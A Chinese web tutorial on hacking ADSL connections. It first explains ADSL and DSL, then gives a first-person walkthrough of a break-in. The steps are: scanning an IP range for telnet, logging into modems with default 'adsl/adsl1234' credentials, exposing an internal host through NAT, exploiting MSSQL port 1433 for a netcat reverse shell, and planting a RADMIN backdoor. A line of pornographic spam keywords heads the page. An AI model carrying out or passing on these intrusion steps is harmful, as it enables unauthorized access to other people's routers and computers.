不卡AV在线|网页在线观看无码高清|亚洲国产亚洲国产|国产伦精品一区二区三区免费视频

學習啦>學習電腦>電腦安全>網絡安全知識>

如何入侵ADSL

時間: 權威724 分享

  什么是ADSL?

  ADSL屬于DSL技術的一種,全稱Asymmetric Digital Subscriber Line( 非對稱數字用戶線路),亦可稱作非對稱數字用戶環(huán)路。是一種新的數據傳輸方式。

  ADSL技術提供的上行和下行帶寬不對稱,因此稱為非對稱數字用戶線路。

  ADSL技術采用頻分復用技術把普通的電話線分成了電話、上行和下行三個相對獨立的信道,從而避免了相互之間的干擾。用戶可以邊打電話邊上網,不用擔心上網速率和通話質量下降的情況。理論上,ADSL 可在5 km 的范圍內,在一對銅纜雙絞線上提供最高1 Mbps的的上行速率和最高8Mbps的下行速率(也就是我們通常說的帶寬),能同時提供話音和數據業(yè)務。

  一般來說,ADSL 速率完全取決于線路的距離,線路越長,速率越低。

  ADSL技術能夠充分利用現(xiàn)有PSTN(Public Switched Telephone Network ,公共交換電話網),只須在線路兩端加裝ADSL設備即可為用戶提供高寬帶服務,無需重新布線,從而可極大地降低服務成本。同時ADSL用戶獨享帶寬,線路專用,不受用戶增加的影響。

  最新的ADSL2+技術可以提供最高24Mbps的下行速率,和第一代ADSL 技術相比,ADSL2+打破了ADSL接入方式帶寬限制的瓶頸,在速率、距離、穩(wěn)定性、功率控制、維護管理等方面進行了改進,其應用范圍更加廣闊。

  什么是DSL?

  DSL的中文名是數字用戶線路,是以電話線為傳輸介質的傳輸技術組合。DSL技術在傳遞公用電話網絡的用戶環(huán)路上支持對稱和非對稱傳輸模式,解決了經常發(fā)生在網絡服務供應商和最終用戶間的“最后一公里”的傳輸瓶頸問題。由于DSL 接入方案無需對電話線路進行改造,可以充分利用可以已經被大量鋪設的電話用戶環(huán)路,大大降低額外的開銷。因此,利用銅纜電話線提供更高速率的因特網接入,更受用戶的歡迎,得到了各個方面的重視,在一些國家和地區(qū)得到大量應用。

  DSL包括ADSL(Asymmetric Digital Subscriber Line,非對稱數字用戶線)、RADSL、HDSL和VDSL等等。

  如何入侵ADSL?

  一.掃描

  現(xiàn)在很多ADSL MODEM都是通過 80 23 21 三個端口來管理,但80 21端口有很多服務器都有打開,沒怎么特征性,于是我選擇了23端口,打開我的至愛:SUPPERSCAN,填上我所在地區(qū)的IP段,(跨多幾段都沒關系,反正SUPPERSCAN的速度就是快)眨眼間,結果出來了,開23的主機還真不小?。?我挑了幾臺出來,在瀏覽器那里輸入IP:218.___.___.___,OK。登陸對話框出來了,輸入USER:ADSL pass:adsl1234(因為我這里的adsl modem一般是華碩的,缺省是adsl adsl1234)bingle 一矢中的,現(xiàn)在我就是上帝。

  二.映射

  入侵已經成功了一半,要進一步入侵內網,我們要進行端口映射,但是我連內網的拓撲,都不知道(更不用說內網主機的端口開放情況了)又怎么映射呢?在此,我選擇了猜測。一般來說,MODEM的內網IP缺省是192.168.1.1,而大多數就把自己主機的IP設成192.168.1.2。因此我們只要試試把192.168.1.2的端口映射出來就行了(但如果使用了dhcp就麻煩了)。但是192.168.1.2到底開放了什么端口,我們根本就不知道啊,呵呵,既然不知道,那么我就把他整臺主機透明地映射到外網,具體做法如下:進入NAT選項---添加NAT規(guī)則---BAMID---填入主機IP:192.168.1.2,到此192.168.1.2已經透明地映射到192.168.1.1上了,我們訪問ADSL MODEM就等于訪問主機192.168.1.2了

  三.檢測

  現(xiàn)在我們再請出SUPPERSCAN進行掃描,呵,看到沒有?掃描結果已經不同了,開放的端口是139 1433等,剛才只是開放了80 23 21 而已(也就是說我們的映射已經成功了)該是_-SCAN出手了,用它來掃弱口令最好不過了,但掃描的結果令人失望,一個弱口令也沒有,看來管理員還不算低B啊。

  四.溢出

  既然沒有弱口令,也沒開80,那只好從溢出方面著手了,但沒開80 21 也就webdav .sevr-u的溢出沒戲了,很自然,我向導了RPC溢出,但實踐證明RPC溢出也是不行的,LSASS溢出也不行 。

  五.募然回首,那人卻在,燈火闌珊處

  看來這管理員還是比較負責的,該打的補丁都打上了,這時侯,我的目光轉移到1433上了(嘿,不知道他打了SQL補丁沒有?)心動不如行動,現(xiàn)在只好死馬當活馬醫(yī)了,于是

  nc -v -l 99

  sql2 218.___.___.___ 0 218.___.___.___ 99

  bingle 成功地得到一個shell了。

  六.設置后門

  到這里,我們的入侵已經成功了,余下的是掃尾留后門,至于后門,我一般都是用FTP上傳RADMIN上去

如何入侵ADSL

什么是ADSL? ADSL屬于DSL技術的一種,全稱Asymmetric Digital Subscriber Line( 非對稱數字用戶線路),亦可稱作非對稱數字用戶環(huán)路。是一種新的數
推薦度:
點擊下載文檔文檔為doc格式
512094